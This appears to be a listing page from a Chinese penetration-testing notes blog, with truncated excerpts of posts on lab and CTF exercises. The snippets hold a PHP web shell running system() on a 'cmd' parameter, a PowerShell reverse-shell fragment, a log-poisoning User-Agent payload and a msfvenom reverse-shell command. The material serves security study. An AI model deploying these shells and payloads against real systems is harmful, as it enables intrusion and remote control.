zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
文件上传 使用非可执行文件-白鸢的笔记

文件上传 使用非可执行文件

我们可能会遇到这样的情况:找到不受限制的文件上传机制,但无法利用它。一个例子是 Google Drive,我们可以在其中上传任何文件,但无法利用它来获取系统访问权限。在这种情况下,我们需要利用...
powershell反弹shell制作-白鸢的笔记

powershell反弹shell制作

Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
简单php木马-白鸢的笔记

简单php木马

simple-backdoor.php<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>使用方法:Usage: http://target...
10个月前
0676
php包装器:data:\\-白鸢的笔记

php包装器:data:\\

虽然 php://filter 包装器可用于包含文件的内容,但我们可以使用 data:// 包装器来实现代码执行。此包装器用于将数据元素作为纯文本或 Base64 编码数据嵌入到正在运行的 Web 应用程序的代码中。...
/var/log/access.log 日志污染-白鸢的笔记

/var/log/access.log 日志污染

目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...
对curl进行URL编码-白鸢的笔记

对curl进行URL编码

目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...
枚举和滥用API-白鸢的笔记

枚举和滥用API

在许多情况下,我们的渗透测试目标是内部构建的闭源 Web 应用程序,附带许多应用程序编程接口 (API)。这些 API 负责与后端逻辑交互,并为 Web 应用程序提供坚实的功能支柱。名为表述性状态传输 ...
TryHackMe Windows PrivESC-白鸢的笔记

TryHackMe Windows PrivESC

前期靶机位置:https://tryhackme.com/r/room/windows10privesc准备一个reverse shell(用于普通用户)和一个用于反弹system权限的reverse shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=...
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译-白鸢的笔记

w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.187 Linux 1. 信息收集如果不把域名放入/etc/hosts的话 那么就掉到兔子洞里了所以把这个写入/etc/hosts中访问weakness.jth/| __ / ...
10个月前
09014
Breach 1.0 keystore SSL证书导入wireshark 启动文件提权-白鸢的笔记

Breach 1.0 keystore SSL证书导入wireshark 启动文件提权

实验环境攻击者 Kali 192.168.110.128受害者 IP 192.168.110.140 Linux  此IP是静态IP 需要把自己制作一个同网段的实验环境 1. 信息收集这台机器基本上开启了所有端口 必须过滤我定义成重要的...
10个月前
0677